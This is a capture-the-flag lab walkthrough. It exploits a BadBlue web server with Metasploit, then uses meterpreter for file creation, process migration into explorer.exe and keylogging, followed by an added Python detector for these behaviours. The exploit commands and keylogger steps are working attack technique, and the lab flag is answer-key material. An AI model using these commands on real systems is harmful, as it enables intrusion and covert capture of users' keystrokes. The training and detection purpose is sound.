Walkthrough 1955

This document outlines steps to exploit a Windows system using Metasploit: 1. Nmap is used to find an open port and vulnerable application on the target system. 2. Metasploit is used to exploit a buffer overflow in the Badblue web server and obtain a meterpreter session. 3. Keylogging and file creation commands are used from the meterpreter session to confirm exploitation.

Uploaded by

rivoluzioneai

Name Post-Exploitation: File and Keylogging

URL https://attackdefense.com/challengedetails?cid=1955

Type Windows Exploitation: With Metasploit

Important Note: This document illustrates all the important steps required to complete this lab.
This is by no means a comprehensive step-by-step solution for this exercise. This is only
provided as a reference to various commands needed to complete this exercise and for your
further research on this topic. Also, note that the IP addresses and domain names might be
different in your lab.

Step 1: Checking the target IP address.

Note: The target IP address is stored in the "target" file.

Command: cat /root/Desktop/target

Step 2: Run an Nmap scan against the target IP.

Command: nmap 10.0.0.71


Step 3: We have discovered that multiple ports are open. We will run Nmap again to determine
the version information of the service on port 80.

Command: nmap -sV -p 80 10.0.0.71

Step 4: We will search for an exploit module for BadBlue 2.7 using searchsploit.

Command: searchsploit badblue 2.7


Step 5: There is a Metasploit module for the BadBlue server. We will use the PassThru remote buffer
overflow Metasploit module to exploit the target.

Commands:
msfconsole
use exploit/windows/http/badblue_passthru
set RHOSTS 10.0.0.71
exploit

We have successfully exploited the vulnerable application (BadBlue) on the target and received a
meterpreter shell.

Step 6: Searching for the flag.

Commands:
shell
cd /
dir
type flag.txt

This reveals the flag to us.

Flag: 70a569da306697d64fc6c19afea37d94

Step 7: Switch to the Administrator's Desktop directory and create a text file, i.e. hacked.txt.

Commands:
cd Users\Administrator\Desktop
dir
ECHO "You have been Hacked" > hacked.txt

Step 8: Verifying the created file on the victim machine.

Note: We can switch the view between the "Attacker Machine" and the "Target Machine" by clicking on one
of these tabs, as shown in the snapshot below. They are located at the top left of the challenge window.

Step 9: Running the hacked.txt file from the attacker's machine.

Note: Just enter the name of the file, "hacked.txt", and press Enter.

Command: hacked.txt

Step 10: Verifying whether the hacked.txt file is open on the victim machine.
We have successfully created and launched the hacked.txt file from the attacker's machine.

Step 11: Checking all the running processes on the target machine and migrating the current
process into the explorer.exe process.

Command: ps

We can see that the explorer.exe PID is 2724. We will use this PID to migrate into the explorer.exe
process.

Command: migrate 2724

We have successfully migrated into the explorer.exe process.

Step 12: Running keyscan_start to capture keystrokes.

Command: keyscan_start

Step 13: Typing random text in Notepad.

Step 14: Dump the keylogger data.

Command: keyscan_dump

We have successfully captured all the data entered in Notepad, i.e. in hacked.txt.
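From a defender's side, steps 6 and 11 leave two distinctive traces on the victim: the exploited web server process spawning cmd.exe (`shell`), and that same process opening explorer.exe with memory-write and thread-creation rights (`migrate 2724`). The following is an added example, not part of the lab or of Metasploit; it triages constructed Sysmon-style ProcessCreate (Event 1) and ProcessAccess (Event 10) records for exactly those two behaviours. The service binary name badblue.exe, the file paths and the access masks are assumptions for illustration.

```python
# Added example (not from the lab): triage constructed Sysmon-style events for
# the two post-exploitation actions in this walkthrough, `shell` (cmd.exe spawned
# by the web server process) and `migrate <pid>` (the web server process opening
# explorer.exe with injection-capable rights). Binary names and masks are assumed.

PROCESS_CREATE_THREAD = 0x0002   # needed to start a thread in the target process
PROCESS_VM_WRITE = 0x0020        # needed to write the payload into the target
INJECT_MASK = PROCESS_CREATE_THREAD | PROCESS_VM_WRITE

# Assumed name of the BadBlue service binary; a web server has no business
# spawning shells or opening other processes for writing.
WEB_SERVICE_IMAGES = {"badblue.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}

def _basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def triage(events):
    """Return (rule, detail) findings for a list of Sysmon-like event dicts.
    Event 1 fields: Image, ParentImage. Event 10 fields: SourceImage,
    TargetImage, GrantedAccess (hex string, as Sysmon logs it)."""
    findings = []
    for ev in events:
        if ev["EventID"] == 1:
            parent, child = _basename(ev["ParentImage"]), _basename(ev["Image"])
            if parent in WEB_SERVICE_IMAGES and child in SHELLS:
                findings.append(("webserver_spawned_shell", f"{parent} -> {child}"))
        elif ev["EventID"] == 10:
            src, dst = _basename(ev["SourceImage"]), _basename(ev["TargetImage"])
            access = int(ev["GrantedAccess"], 16)
            if src in WEB_SERVICE_IMAGES and access & INJECT_MASK == INJECT_MASK:
                findings.append(("possible_process_migration",
                                 f"{src} -> {dst} ({ev['GrantedAccess']})"))
    return findings

# Constructed sample events mirroring steps 6 and 11, plus two benign ones.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\BadBlue\badblue.exe"},
    {"EventID": 10, "SourceImage": r"C:\BadBlue\badblue.exe",
     "TargetImage": r"C:\Windows\explorer.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\taskmgr.exe",
     "TargetImage": r"C:\Windows\explorer.exe", "GrantedAccess": "0x1000"},
]

if __name__ == "__main__":
    for rule, detail in triage(SAMPLE_EVENTS):
        print(rule, detail)
```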

References

1. BadBlue 2.72b - Multiple Vulnerabilities (https://www.exploit-db.com/exploits/4715)

2. Metasploit Module (https://www.rapid7.com/db/modules/exploit/windows/http/badblue_passthru)
